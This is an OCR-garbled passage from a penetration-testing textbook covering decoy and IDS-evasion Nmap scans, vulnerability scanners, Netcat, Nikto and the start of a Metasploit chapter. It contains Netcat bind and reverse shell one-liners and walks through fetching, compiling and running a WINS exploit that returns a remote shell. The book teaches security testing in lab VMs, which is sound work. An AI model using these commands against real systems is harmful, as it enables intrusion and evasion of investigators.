one packet per decoy plus our scanning host. Why would a hacker want to do this? Well, he can 
designate as many decoys as he wants, and basically this will throw off the ability to really pin- 
point where the scanning is really originating from. Therefore, if during the scan and attack the 
hacker hides his IP address between many external foreign IP addresses, it makes it very difficult 
to locate the attacker. Not only does this confuse investigators, but also it also quickly fills up logs 
and makes them much harder to analyze. Therefore, notice in the example a single IP address scan 
generate almost 3000 packets, well, 3000 x 3 (2 decoys + 1 scanning host), equal to over 9000 
packets. This is quick way to fill up logs and really complicate log analysis. 


tie Edit View Go Capture Analyze Statistics Help 
TITTNITETTPTEXIIIE & Q & FI - 
te. v | 4 Expression... acl 7 


33 4.822986 192. 168. 22, 132 192.168.1.2 


b Frame 33 (60 bytes on wire, 60 bytes captured) 

b Ethernet II, Src: Vmware_c7:a7:b6 (00:0c:29:c7:a7:b6), Dst: Vmware f1:48:52 (00:50:56:f1:48:52) 

> Internet Protocol, Src: 192.168.22.132 (192.168.22.132), Dst: 192.168.1.2 (192.168.1.2) 

> Transmission Control Protocol, Src Port: pptp (1723), Dst Port: 43906 (43906), Seq: 1, Ack: 1, Len: O 


00 50 56 f1 48 52 00 
00 28 99 79 00 00 80 
01 02 06 bb ab 82 00 

O 00 


Oc 
06 
00 
00 


00 00 74 ac 00 O t 


Ready to load or capture ‘Packets: 3178 Displayed: 3178 Marked: 0 Droppe... :| Profile: Default 
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The option “--randomize-hosts (Randomize target host order)" causes Nmap to shuffle up to 
16,384 hosts before it scans them. Also, there is the randomized host option. This allows Nmap to 
randomize the hosts before it scans. This makes it's a lot /ess obvious because the IP address scans 
are not incremented. 

There are not many ways to really detect decoy Nmap scans, however, if the scan is internal 
to the network, network defenders can at least compare and contrast MAC addresses. While 
scans can feature decoy IP Addresses, if they are internal, the MAC address will remain the same. 
Obviously this would likely change if the other hosts were directly scanning the computer them- 
selves. However, to also prevent your logs from filling up, make sure you increase the size of the 
logs from the default level to preferably 3 times the default or more. 


Nmap Randomization and Speed 


Nmap is not a very stealthy tool by default and creates an extreme amount of noise on the network. 
work. An advanced hacker will try to use scans that prevent him from getting caught by elimi- 
nating excess noise on the network. Subsequently Nmap contains timing and performance com- 
mands, which actually spread the noise out over time on the network and limit parallel scanning 
to prevent detection. Remember, the hacker recognizes the benefits of being stealthy and being 
patient. When using the timing and performance options, the slower the scan the more accurate 
the scan information. The faster the scan, the less accurate the information could be, as packets 
could possibly be dropped. 

Options that take «time» are in milliseconds, unless you append ‘s’ (seconds), ‘m’ (minutes), 
or ‘h’ (hours) to the value (e.g. 30m). 


-T<0-5>: Set timing template (higher is faster). 

-T0 = Paranoid—IDS evasion. Painfully slow, one port is scanned at a time with 5 minute 
intervals. 

-T1 = Sneaky—IDS evasion. Slow; waits 15 seconds between scans. 

-T2 = Polite; waits 0.4 seconds between scans. 

-T3 = Normal; the default Nmap scan level and uses parallel scanning. 

-T4 = Aggressive. 

-T5 = Insanely fast; drastically speeds up Nmap scans. 


Examples of a command using Timing and Performance options: 
B root@bt:/pentest# nmap -v -T5 -sS -D 192.168.1.3, 192.68.1.43 192.168.22.132 
Summary: 


# nmap -v -PN 192.168.1.1-254 < Scan network range 

# nmap -v -sV 192.168.22.132 < Identify service/versions 

# nmap -v -sV -O -f --mtu 16 192.168.22.132 «— Fragment MTU 

# nmap -v -sS -D 192.168.1.3, 192.68.1.43 192.168.22.132 < Randomize scans 
# nmap -v -sS -T5 192.168.1.3 < Designate speed 
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PortOry 


One important thing to note is that the hacker may not have the ability to use Nmap. He might 
not be able to download Nmap internally to the network, or he may not want to use it because it 
can easily be picked up by IDS logs or antivirus scanners. Therefore, he may want to use tools that 
have a smaller fingerprint, are lesser known, and are common among the operating system that he is 
targeting. One such tool is PortQry (http://support.microsoft.com/kb/832919). PortQry is a TCP/ 
IP port scanner that is included in the Windows Server 2003 support tools and allows reporting 
and gathering status on varying TCP and UDP ports. This is a great small executable that provides 
robust scanning tools, and it works on remote machines on the network. 


Autoscan 


Autoscan (http://autoscan-network.com/) is a quick information gathering tool included with 
BackTrack; it quickly tells you what hosts are available, their hostname, and the operating system 
being run without you really designating any commands. 

You can run it by going to BackTrack > Identify Live Host > Autoscan. 


AutoScan Network 1.42 


ë © 
Search Settings Intrusion Alert Help 


@ 192168221 ## Unknown ## 
$ 192168222 ## Unknown ## 
@ 192 168 22 130 Agent 

$ 19216822132 DEV-v-3 ## Unknown ## 
E 19216822 254 ## Unknown ## 


My Network List 
-€ Local network Total: 5 (0/0)%100 jg: R : 0 o/s S : 0 o/s v S R:00/sS:00/s 


Nessus 


Once the hacker has really fingerprinted the network and identified the host range, the services 
running on the host, and lastly the version information, the hacker will want to possibly com- 
mence a vulnerability scan to see the avenues of attack he has against the victim. One such tool 
available to performing vulnerability scanning is Nessus (http://www.nessus.org/). Nessus is a 
vulnerability network-scanning tool, used to identify vulnerabilities in networks. 

Once again, BackTrack 4 is our default platform for hacking tools, as many of the tools needed 
are inside. It is recommended that you grab the VM. In order for Nessus to work you must have 
installed in Linux not only the Nessus client (nessus) but the Nessus server (nessusd). However, 
if you wish to run this in Windows, all you have to do is install the latest executable at Nessus’s 
website. In order to install a version of Nessus, type: 


B sudo apt-get update 
B sudo apt-get install nessus 
B sudo apt-get install nessusd 


It is recommended that you download the latest version of Nessus directly from the website. 
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You can also go to http://www.nessus.org/. Grab the 32-bit Nessus_i386.deb file and import it 
into BackTrack. Use the following command to install it: 


rootQbt:-£ dpkg -i ‘/root/Nessus-4.2.2-ubuntu810_i386.deb’. 


While this installs a version of the Nessus engine, Nessus’s powers lies in it its plug-ins. The 
scanning engine still does its job. To start the Nessus server in Linux type root@bt:~# /opt/nes- 
sus/sbin/nessusd or nessusd (depending on install). To add a user to Nessus in order to start 


scanning: 


B rootbt:-£ /opt/nessus/sbin/nessus-adduser or nessus-adduser 
B Login: root 
B Login password: pass 
B Login password (again): pass 
You should see output like this: 


B rootbt:-£ /opt/nessus/bin/nessus-fetch --register Place Product Key Here 


This lets you set a key that you obtain from Nessuss's website; the home version is free and provides 
you with the latest updates, but this version can only be utilized in a home environment. 


Upgrade the Vulnerability/Plug-ins Database 
To upgrade the vulnerability/plug-ins database, use the following command: 
B rootbt:-£ /opt/nessus/sbin/nessus-update-plug-ins 


Or in Windows just grab and install the executable. This is a much easier option! 


[s] Nessus Server Manager x| 
ul É 
— 


t Ewe © Nessus 


Iv. Start the Nessus server when Windows boots 


When enabled, the Nessus server will be automatically 
started by Windows every time the system boots up. 


Your scanner is registered and can download new plugins 


from Tenable. 
Clear registration file Update plugins | 
Iv. Perform a daily plugin update 


Tf this option is set, your Nessus server will update its plugins every 
24 hours, 


IV [allow remote users to connect to this Nessus server | 


Stop Nessus Server Start Nessus Server | 
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Notice it allows you to update the plug-ins; the plug-ins are what are used for scanning. 
‘Therefore, the more updates\the plug-ins the more vulnerabilities that you are able to find. 

To start, Nessus allows you to log on to the Nessus server, either pointing to your web browser 
at 8834 using security center or by using a client and pointing it port 1241. Start the Nessus client 


by typing 
B /usr/bin/nessus or nessus (depending on install) 


To start scanning, point your browser to https://N ESSUSIP:8834/. 


Note: Make sure you set a user first, such as user hacker, password pass. One of the benefits of 
using a web browser is that multiple computers can manage the vulnerability scanning. 


Nessus Policies 


In this section you need to first define how Nessus is going to scan targets in order to find vulner- 
abilities. Notice that Nessus has port-scanning capabilities such as Nmap. A hacker can do inter- 
nal scans using the Nessus bridge which is a feature of Metasploit; he may also use it externally. 
Either way the primary use for Nessus is to test given server configurations for vulnerabilities so 
he knows what exploits to use. 


000 Nessus 


a |e | (+ |B hups://192.168.22.133:8834/ € | (Q7 Google 


Policies Scans Policies Users 


€ Add Policy Network Congestion 


lel C 


General 
Port Scanners 


Cancel Next 


Nessus Credentials 


Also, notice with Nessus that you have to ability to enter in credentials as part of a scan, so if you 
have an administrator password or login information for Kerberos or SSH, Nessus can perform 
more robust scans at the administrator level in order to provide more detailed vulnerability infor- 
mation. Otherwise, Nessus would just be scanning at a lesser level, the typical level the hacker sees 
anyway! Therefore, the next screenshot shows what the hacker would see on the network; however, 
he could also use this in a test environment to test the vulnerabilities of certain server configura- 
tions to see what might be vulnerable to exploit. 
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eoo Nessus a 


LaTe (= rtos:/92.168.22.133:834/ = 


hacker | Hop | About 
les | 


Policies Reports Scans Policies ^ Users 


@ Add Policy crsdeniai ype 
Windows credentials 

SSH settings 

Kerberos configuration 
Cleartext protocols settings 


Credentials 
Plugins 


Preferences 


Additional SMB a 
Additional SMB pa 
nal SMB domain (optional) (2) 
Additional SMB account (3) 


Additional SMB password (3) 


Cancel Back 


Nessus also allows you to choose which plug-ins to scan your targets with. Sometimes it’s best 
just to throw everything at it and see what is vulnerable, however this can cause the server to crash 
and will definitely be noisy. A good but noisy option is just to check “Enable All” and enable about 
40,000 plug-ins, which scans thousands of known vulnerabilities. 


Nessus 


a | e | | + [Bi nitps://192.168.22.133:8834/ € | (@ Google 


hacker | Hep | Atout | Logout 


Policies “Reports Scans Policies ^ Users 


® Add Policy Filter [Name v | (Slaw Show Only Enabled Plugins Reset Filter 


Families Plugins 
Q) Ubuntu Local Security Checks BIO se i 9 

Q VMware ESX Local Security Checks 7-Zip ARJ File Handling Overflow 

Q web servers Absolute Software Computrace LoJack for Laptops D. 


Plugins 
Acer AcerCtris APlunch ActiveX Arbitrary Command E| 


Preferences Q Windows : Microsoft Bulletins Acer LunchApp.APlunch Activex Arbitrary Command | 
I@ Windows : User management activePDF Server < 3.8.6 Packet Handling Remote Oy 


Plugin Description 
7-Zip < 4.57 Archive Handling Unspecified Issue 


‘Synopsis 
The remote Windows host has a program that is affected by an 
unspecified vulnerability. 


Enabled Families: 42 Enabled Plugins: 39582 Enable All Disable All 


Cancel Back Next 


Notice once the scan is completed, it gives security ratings of high, medium, and low, and how 
many ports are open on these hosts. The hacker wants to exploit the vulnerabilities that are likely 
going to get him into the computer or network, therefore, he likely wants to focus on the high 
exposures rather than the low-priority ones. 


Host a | Total High Medium Low Open Port 
192.168.22.131 78 0 49 24 
192.168.22.133 99 9 51 36 
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epmap 
netbios-ns 


smb 


Idap 

dfs 

kpasswd? 
http-rpc-epmap 
Idaps? 


Once the scan is done Nessus gives a list of ports and the high, medium, and low vulnerabili- 
ties associated with that service. Therefore, the services with the vulnerabilities are what the hacker 
is going to target. 


Plugin ID: 35362 Service: cif ] Severity 
Plugin Name: M 1: Mic s SMB Vu 


Synopsis 
Itis possible to crash the remote host due to a flaw in SMB. 


Description 

The remote host is affected by a memory corruption vulnerability in 
SMB that may allow an attacker to execute arbitrary code or perform a 
denial of service against the remote host. 


Solution 


Microsoft has released a set of patches for Windows 2000, XP, 2003, 
Vista and 2008 ; 


Critical 


CVSS Base Score 
10.0 (CVSS2#AV:NIAC:LiAu:NIC:CII:CIA:C) 


Lastly, you can see this was from a high-severity vulnerability based on the 445 SMB service 
in Microsoft Windows. This vulnerability actually corresponds to a Microsoft MS09-001 security 
bulletin. This tells us that this computer is not only most likely vulnerable to this exploit but also 
that it was most likely never patched. 


OpenVAS 


Open Vulnerablity Assessment System (OpenVAS; http://www.openvas.org/) is a framework for 
vulnerability scanning. OpenVAS has released software, such as the OpenVAS scanner, that will 
allow network vulnerability tests against victims. The OpenVAS client allows you to connect to an 
OpenVAS server, which contains the security plug-in information, much like how Nessus works. 

To start the OpenVAS server, navigate to BackTrack > Vulnerability Identification > 
OPENVAS. Select OpenVAS Server. Click OpenVAS Cert or Type. This tells OpenVAS to create 
a security certificate to be used to connect to this server to do vulnerability scanning. You must do 
this before connecting to the OpenVAS server. 

rootbt:-£ openvas-mkcert. To create a new OpenVAS user, use the following command: 


B root@bt:-# openvas-adduser 
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To use the OpenVAS client, open the OpenVAS client under Navigate to BackTrack > Vulnerability 
Identification > OPENVAS > OpenVAS Client. 
To start the OPENVAS Daemon from the command line, type the following command: 


root@bt:~# openvasd 


Plug-in Update 


The NASL plug-ins contain more than 18,000 network vulnerability tests. To update the OpenVAS 
plug-ins, type root@bt:~# openvas-nvt-sync. 


OpenVAS Server 


Hostname: Port: 
localhost [9390 IBI Default | 
Authentication 
Login: 
root 
Password: 


paet ooo 


O Authentication by certificate 


Trusted CA: 


[cacetpem ^ seec.] 
Bs 
mg 

Xx Cancel [Lex | 


In this window, when we start OpenVAS we need to designate what user to authenticate to. 
Therefore, make sure that you add a user using the openvas-adduser command. Also, you can 
also login by creating security certificates for users. 


OpenVAS-Client 
Ele View Task Scope Report Extras Help 
Global Settings 
Options | | 


X) General Plugin selection 
Global Settings ^ E 


[Name Warning | Active 
> AIX Local Security Checks 
b Backdoors 


E credentials 
EP Target selection 
(B access Rules 


(9 Prefs. 


> 
b 

Æ «e > CGI abuses 
b 
b 


Brute force attacks 
Buffer overflow 


CGI abuses : XSS 
cisco 


1G E [E [3 [E [9 (Jl 


+ | 11846 plugins; 11846 enabled 


No filter active Filter... 


(Enable al ^ ) Disable all 


Expand all Collapse all 


Dependencies: [7] Enable at runtime O Silent 


Automatically enable new plugins 


Global NVT Timeout (sec):|320 [= 


‘Konnection: root@localhost 


Research Time: Finding the Vulnerabilities m 247 


OpenVas is very similar to Nessus, and like Nessus, you have to designate which plug-ins to 
scan against the target systems. The easiest way to do a comprehensive scan is just to enable all. 
However, this can take a very long time to complete. Additionally, you also have the ability to 
enter in credential information for more robust scanning. 


Scan Assistant 


Step 1: Task | Step 2: Scope Step 3: Targets | step 4: Execute | 


Targets are the hosts and networks you want to scan in this scope. 
They can be entered in the following formats: 

- simple hostname (for hosts in your LAN) 

- fully qualified host name (e.g. www.example.com) 

- IP adress (e.g. 192.168.0.1) 

- IP network (e.g. 192,168,0.0/24 or 192.168.0.0/255.255.255.0) 
You can enter several targets by separating them with a comma. 


Please enter the targets to scan: 
192,168,1,131 


Warning: Please make sure you are allowed to scan these hosts! 
Harmful checks are disabled by default, but some computers and 
especially print servers have bugs which might crash them. 
Consider getting a written permission before scanning important 
servers which are in production. 


4s Back | X cancel | 


Once you have gone into Scan Assistant, go in to make sure that you select the targets that you 
want to scan. Next, click Forward again and your vulnerability scan should execute immediately. 


OpenVAS-Client 


Ele view Task Scope Report Extras Help 
B 1 8 FT e Report for BEODNIIAOCE TIO MEE Company 2) 
— Comments | Options Report | 


Name Host/Port/Severity Reported by NVT "Vulnerability in Server Service Could Allow Remote Code Exe L 
Global Settings 


7 Q 192.168.22.133 


* Company 1 
-— v Q microsoft-ds (445/tcp) MS08-067 
Y TARGET 1 E; 


Report 20101102-010109 


Company 2 
= pany E Å netbios-ns (137/udp) Vulnerability Insight: 
TARGET 2 ~ p A epmap (135/tcp) Flaw is due to an error in the Server Service, that does not properly 


Report 20101102-010556 handle specially crafted RPC requests, 
unknown (1028/tcp) 


v 


Overview: This host has critical security update missing according to 
9 Security Note Microsoft Bulletin MS08-067. 


@ netbios-ssn (139/tcp) Impact: Successful exploitation could allow remote attackers to take 
| complete control of an affected system. 

9 netarx (1040/tcp) E 
neod2 (1048/tcp) 1| Variants of Conficker worm are based on the above described vulnerability. 
i More details regarding the worm and means to resolve this can be found at, 
msft-gc-ssl (3269/tcp) http:/technet microsoft .com/en-us/security/dd452420.aspx 
Idaps (636/tcp) 
general/tcp 
general/SMBClient Affected Software/OS: 

I/SMB Microsoft Windows 2K Service Pack 4 and prior. 
generays! Microsoft Windows XP Service Pack 3 and prior. 
cap (1026/tcp) Microsoft Windows 2003 Service Pack 2 and prior, 


blackjack (1025/tcp) Fix: Run Windows Update and update the listed hotfixes or download 

domain (53/tcp) [-] and update mentioned hotfixes in the advisory from the below link, 
o ki 

>] Scan took place from Tue Nov 2 01:04:59 2010 to Tue Nov 2 01:05:56 2010 


‘fiot connected È 


Impact Level: System 


Notice that this tool is also very good for organizing scans against multiple enterprises, net- 
works, and hosts. As you can see it identifies a RED security hole under port 445 on the Windows 
box, and gives us more information about Microsoft security bulletins featuring the vulnerability 
of this Windows system. This tool also has the ability to export the scan contents out of the pro- 
gram. Using multiple vulnerability scanners is important for hackers because different scanners 
can predict different vulnerabilities. This allows the hacker to figure out a greater avenue of attack. 
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The best way to defend against vulnerabilities is to patch your system with the latest patches! 
However, one of the best ways to defend your network is to perform your own vulnerability assess- 
ment against your IT infrastructure—that way you can mitigate those vulnerabilities found and 
improve the security posture of your organization. 


Netcat 


Netcat (http://netcat.sourceforge.net/) is a free and open source tool, which allows the reading 
and writing of data over a network. Hackers many times use this to export data over the network, 
for banner grabbing, or even for setting up command and control systems. In this chapter we are 
mainly concerned with using this as an information-gathering tool. 

Connecting with Netcat: 


B nc TARGETIP PORT 
Listening with Netcat: 


B nc-l-p PORT NUMBER 


Notice that we can couple this tool with Nmap. Therefore in this host we may see various services 
that are up. 


Session Edit View Bookmarks Settings Help 


Starting Nmap 5.08 ( http://nmap.org at 2010-11-81 21:56 EDT 


@ Shell 


Port Scanning with Netcat 


The hacker can use this to easily tell which ports are open against a given target. This is a very 
good way to perform gathering techniques on hosts, especially when the attacker is resident inside 
a network and wouldn't have the ability to upload a Nmap onto his targets. 


nc --v -n -z -w 1 TARGETIP STARTPORT-ENDPORT 
root@bt:-# nc -v -n -z -wl 192.168.22.133 1-500 
(UNKNOWN) [192.168.22.133] 464 (kpasswd) open 
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(UNKNOWN) [192.168.22.133] 389 (Idap) open 
(UNKNOWN) [192.168.22.133] 139 (netbios-ssn) open 
(UNKNOWN) [192.168.22.133] 135 (loc-srv) open 
(UNKNOWN) [192.168.22.133] 88 (kerberos) open 
(UNKNOWN) [192.168.22.133] 53 (domain) open 


In this example, notice how Nmap can also be used as a scanning tool and identify which ports 


are open on a target. 
To grab TCP banner: 


B echo “” | nc-v -n -w1 TARGETIP STARTPORT-ENDPORT 
B root@bt:~# echo “” | nc -v -n -w1 192.168.22.131 1-2000 


Sample output: 


rootQbt:-£ echo “” [nc -v -n -w1 192.168.22.131 1-2000 

(UNKNOWN) [192.168.22.131] 995 (pop3s) open 

(UNKNOWN) [192.168.22.131] 993 (imaps) open 

(UNKNOWN) [192.168.22.131] 143 (imap2) open 

* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE 
STARTTLS LOGINDISABLED] Dovecot ready. 

* BAD Error in IMAP command received by server. 

AC 


As you can see in this example, depending on the protocol, Netcat allows the hacker to gather 
information on the service running in the background, and banner grab service information from 
the host. 

To push information to a file, use 


B nc-l—p PORT > FILENAME 


Netcat also gives you the ability to push information to a file if needed; this is important for exfil- 
tration information or further direct research. 
To create backdoor shells: 


B nc-l-p PORT -e/bin/bash < Linux 
B nc-l-p PORT -e cmd.exe «— Windows 


Netcat also gives you the ability to create a backdoor shell that you can connect to command and 
control a computer. 
'To send out a reverse shell: 


B ncIPADDRESS PORT -e /bin/bash 
B ncIPADDRESS PORT -e cmd.exe 


Netcat also gives you the ability to designate Netcat as a backdoor; this means that basically 
Netcat will beacon out to a designated IP address and port and execute a command prompt. 
Netcat is a system administration tool. It does however often get picked up by antivirus. 
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Nikto 


Nikto is a web servicescanning tool that is primarily used to find vulnerabilities on web servers. 
Nikto can be used to check again dangerous files, outdated versions, vulnerabilities, or poor con- 
figuration. Nikto is included on the latest version of BackTrack. 

To install the latest version of Nikto on Ubuntu/BackTrack, type 


B sudo apt-get install nikto 


Once you grab Nikto make sure you have the latest updates that are available, by typing the fol- 
lowing command: 


./nikto -update 


To run a web scan using Nikto from a Linux command shell: 
B root@bt:/pentest/scanners/nikto# ./nikto.pl -host 


root@bt: /pentest/scanners/nikto - Shell - Dradis Server 


root@bt: 
Nikto v2.1 


+ Target IP 

+ Target Hostname 
+ Target Port 

+ Start Time 


+ Server: No banner 
+ robots.tx or E ri whi hould be manually view 

+ Number of < r ] rsi tring differ-from those in the database, the server 
reports: pas server 5pyt , j while theedatabase as: 0.5. This may cause fals 
e positi 

+ OSVDB-5 7: Wet i may rev it ntern IP « |'ostnam in the Location header. The 


value is 


*&submitesGo&linecnts500&ref 
any location on the remote s 


+ 
+ 
r 
y 
+ /phpwebfilemgr f etc: phpWebFileManager v2.0.0 and 


prior are vulner a 

+ /myphpnuk r € i al lnerable);[/script]?querys: myphp 

nuke is vulne [ £ cript - E h /www.cert.org/advisories/CA-2000 

02.html. 

+ /myphpnuke/links.php? tPopular&ratenum-[script]alert(document.cookie); [/script]&ra 
te Scripting (XSS). http://www.cert.or 


Web Wiz Forum 


@ Shell 


Notice that this scans for common vulnerabilities and exposures to a web server. One of the first 
things that hackers look for, is a robots.txt file. A robots.txt file is put on the root of a web server 
directory to prevent bots such as Google and various web crawlers from crawling the website and 
making it searchable. 

Also notice that it looks for common vulnerabilities, for example, it tests for cross-site scripting 
capability; this is another initial vector where the hacker can try to hook individuals. 
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Here is a sample line of output and a solution to secure the system: 

+ OSVDB-2722: /bytehoard/index.php?infolder=../../../..l..1..1..l.-l..l..l.. letci: ByteHoard 0.7 is 
vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher. 

Also notice that this tests against the OSVDB, the open source vulnerability database located 
at http://osvdb.org/. This is also another good resource for finding vulnerabilities on targets. The 
OSVDB recently broke over 60,000 database entries. 

Once again the best way to defend against vulnerability scanning is to patch your systems! 
However, it is also important to configure your servers against a configuration guide. The National 
Institute for Standards and Technology actually makes recommendations for proper security 
deployment. Go to http://csrc.nist.gov/publications/PubsSPs.html for more information. 

Next, it is extremely important to run this scanning tool against your servers or have a penetra- 
tion test done, to see your exposure and vulnerabilities that are out there on your servers. Once the 
scan is done, you can start trying to patch and fix these vulnerabilities and exposures. This is why 
organizations have penetration tests done. 

To make sure your robots.txt file is secure and it doesn’t give up the entire web structure of 
your website, make sure if you have a robots.txt file it contains a *. This will prevent your entire 
website from being indexed, and prevent hackers from knowing the directory structure of your 
website. 

User-agent: * 

Disallow: / 


Summary 


From this chapter, remember it’s all about how hackers go about finding the vulnerabilities they 
gain from their research and exploiting the targets they wish to attack. Once again, if they are able 
to obtain the research that they need discretely without getting noticed, then they will be highly 
successful in their attack because they were able to find specific vulnerabilities to exploit. Direct 
methods available to the hacker gather much more beneficial and exact information on the target 
but also increase his likelihood of getting caught by creating much more robust digital footprints 
across the network. However, that is the sacrifice of finding the information needed to exploit a 
particular system. 


Chapter 10 


Metasploit 


Introduction 


If someone you meet tells you that they are a hacker, the first question you should ask them is 
“What do you know about Metasploit?” If they are unfamiliar with Metasploit, odds are they 
have never hacked anything in their life. While the previous statement may have been a bit of an 
exaggeration, I do feel that any hacker or security professional should have been exposed to and 
used Metasploit at some time. You do not have to hack anyone to use the product. Set up a virtual 
machine (VM) with an unpatched operating system (OS) without antivirus or a firewall. Once 
you become more familiar with using Metasploit, you can practice against VMs that are fully 
patched with antivirus and their firewalls enabled. 

The fact that Metasploit causes your antivirus program to get agitated is a very good rea- 
son to consider using the framework on a Linux, Unix, or Mac platform. Another option is to 
consider using the version of Metasploit that comes included with BackTrack. Although it is 
convenient to use the Metasploit that comes with BackTrack, Metasploit works well on any ver- 
sion of Ubuntu. 

The current version of Metasploit, framework 3, is written in Ruby. The older framework, 2, 
was written in Perl. There are several components to Metasploit, including msfconsole, msfgui, 
msfweb, msfencode, msfcli, and msypayload. We will spend most of this chapter concentrat- 
ing on msfconsole and msfpayload. Both msfweb and msfgui have been phased out in some 
versions of Metasploit, although I have had some luck getting both of those products to work 
successfully. 
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root@bt: /pentest/exploits/framework3 - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


617 exploits - 306 auxiliary 


215 payloads - 27 encoders - 8 nops 
svn r10857 updated today (2010.11.01) 


W M H I! 


[ 
[ 
[ 
[ 


(5) ut Shell | 


When you first start using a program like Metasploit, it is a good idea to run your attack in a vir- 
tual environment. This way, no one gets upset about having their system attacked. You can download 
VMware Player or Server for free. And, you can also download Microsoft Virtual PC and Virtual 
Box for free as well. Use whichever software you are comfortable with to run your VMs. I will be 
using VMware, which is widely used and easy to use for people new to VMware environments. 

For now, start by using two VMs, one as an attack machine and one as the victim. Using a 
Microsoft OS as the victim machine works well because the large majority of people are most com- 
fortable in the Windows environment. XP also makes a good victim, especially if it has SPO or SP1 
(there are also plenty of exploits for SP2 and SP3). While Windows 2003 can be used as a victim 
for some exploits, Windows 2000 makes an ever better victim because it has no built-in firewall 
and has many unnecessary services installed and running by default. The people at Metasploit have 
also put together a Linux VM called Metasploitable that you can launch your attacks against. It 
can be downloaded at www.metasploit.com/express/community via a BitTorrent client like Vuze. 

The latest BackTrack VM can be downloaded at http://www.backtrack-linux.org/downloads. 
Hopefully, you have a high-speed connection; otherwise the 2500 MB download may take quite a 
while. One you download the file, unzip it with 7-zip and open the VMX file with your version or 
VMware (or just double click on it). You do not have to log in to the newest version of BackTrack, 
but you will need to type startx to launch the graphical user interface (GUI). If the default screen 
resolution does not suite you, you can type xrandr —s 1024x768 to set the resolution. 

Before you do any type of attacking, set your IP address, default gateway, and domain name 
system (DNS) on your BackTrack machine by typing dhclient. The dhclient command will 
configure your network settings automatically. In some specific situations there is a requirement 
to manually set your IP address, default gateway, and DNS server. The IP address, default gate- 
way, and DNS server you use will depend on your network’s environment. My environment is 
a typical one for a home environment, using a Linksys router. The DNS address used is from 
www.opendns.com, and should work for you regardless of your situation. To manually set your 
address, type the following: 
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B ifconfig eth0 192.168.1.100 netmask 255.255.255.0 up 
B route add default gw 192.168.1.1 
E echo nameserver 208.67.222.222» /etc/resolv.conf 


ifconfig ethO 192.168.1.100 netmask 255.255.255.0 up 


route add default gw 192.168.1.1 
echo nameserver 208.67.222.222 > /etc/resolv.conf 


Whether you set your IP address using dhclient or manually, you need to test it. To test it, either 
open up Firefox and connect to Google or type ping www.google.com —c 1. 

After your IP address has been set, it is a good idea to run the msfupdate command from the 
terminal before you start. This will ensure you have the latest exploits and payloads. BackTrack 
has a program called Conky that will provide your central processing unit (CPU) and RAM 
monitoring, external and internal IP address information, and other vital statistics. Type conky 
at the terminal and the real-time monitoring program will appear on the right side of your screen. 


The msfconsole is an easy-to-use interface that is ideal for individuals who are learning to use 
Metasploit. To start the msfconsole environment, open a terminal window and type msfconsole. 


Note: In previous versions of BackTrack, ./msfconsole needed to be typed from the /pentest/ 
exploits/framework3 directory. To see what Metasploit has to offer you, type the command show 
all at the msf terminal. Metasploit has the following components: 


B Auxiliary modules 
B Encoders 
B Exploits 
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B NOP generators 
m Payloads 
B Plug-ins 


To see more details about a specific item, like exploits, type show exploits. Metasploit has exploits 
for Windows, Mac OS X, Linux, and Unix. 


m e root@bt: /pentest/exploits/framework3 - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


[lale] 


(8) =æ Shell | 


The exploit columns include the name of the exploit and its disclosure date, rank (rat- 
ing), and description. For a more detailed description of the exploit, type info followed 


by the exploit name. The Info screen will also provide you with web links to vulnerability 
reports and exploitable code. 


S root&bt: /pentest/exploits/framework3 - Shell - Konsole | Y% 
Session Edit View Bookmarks Settings Help 


|) = Shell 


One of the references for the exploit is the www.securityfocus.com website. This is a great 
website that allows you to search from a list of software vendors and find corresponding vul- 
nerabilities. SecurityFocus provides you with detailed explanations about the particular vul- 
nerability and in some cases the ability to download code that can be tested against unpatched 
systems. The downloadable code can come in various formats including .exe files in some cases. 
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| icrosoft Windows WINS Association Context Data Remote Memory Corruption Vulnerability - Windows Internet Explorer Wee 
gə- e securtyfous.com ¥] (3) /*)/x] [lo EIE 
He gdt Mem Favortes Tools Heb 
x €- 
ily Favortes — C". Microsoft Windows WINS Association Context Data R... c Eo Coo Pee- seye Tooke Q- ” 


c» SecurityFocus ^ 


Symantec Connect 
A technical community for Symantec customers, end-users, Eb ores and partners. 
* 


info discussion exploit solution references | 
Microsoft Windows WINS Association Context Data Remote Memory Corruption Vulnerability 


Immunitysec have developed a working commercial exploit for their CANVAS product. This exploit is not otherwise publicly available 
or known to be circulating in the wild. 


CORE have developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or 
known to be circulating in the wild. 


Exploit has been released. 101-WINS-v3.cpp is an improved version of 101_WINS.cpp. 


[re far We - 


In the case of this specific exploit, the exploit is written in C and the exploit must be compiled 
to be usable. Download the C code to a machine with a GCC compiler like BackTrack. Open a 
terminal and type the following commands to download and compile the exploit written in C: 


1. wget http://www.securityfocus.com/data/vulnerabilities/exploits/wins.c 
2. gcc wins.c —o wins.fun 
3. ./wins.fun 


:-# gcc wins.c -o wins. fun 
yt: -# ./wins. fun 


tim-hos <connectback- if 
WINShi /.vulnwins.com 


‘(| Shell [ — 


The fact that there were no errors when the C code was compiled is a good thing. Sometimes 
the code will work correctly even if error messages were displayed during compilation. Once the 
code is complied, run it by placing a dot and forward slash in front of it to indicate it should 
be run from the current directory. The compiled program, named wins.fun, indicated that I 
needed to specify the following three parameters: 


1. A victim IP or hostname 
2. An IP address for the victim to connect back to 
3. A port on the attack machine for the victim to connect back to 


I turned on a VM of Windows 2000 server SPÁ with the WINS service running. Next, I started a 
Netcat listener on the attack machine using port 433 by typing nc -l —p 443. I typed the follow- 
ing command to exploit the remote system with my compiled wins.fun command: 


E ./wins.fun 192.168.1.250 192.168.1.100 443 
— 192.168.1.250 was the IP address of the victim 
— 192.168.1.100 is the IP address of the attack machine 
— 443 is the port the attack machine was listing on 
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LIMEN E . GNE DIIJ 
Session Edit View Bookmarks Settings Help 


:-* nc -l -p 443 
Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-1999 Microsoft Corp. 


C:\WINNT\system32>[] «—— — —— —— —————— 
S root@bt: — - Shell.- Konsole; 
Session Edit View Bookmarks Settings Help 


" s.fun 192.168.1.250 192.168.1.100 443 
ting the target 

xploit 

sent 


@ Shell 


The results of the execution of wins.fun with the correct parameters against the Windows 2000 
server running the WINS service provided me with a command shell on the victim's machine. 
Once you have a command shell, you can complete various tasks like account and data manipu- 
lation. Even though you could have used Metasploit to launch this exact attack, you did not 
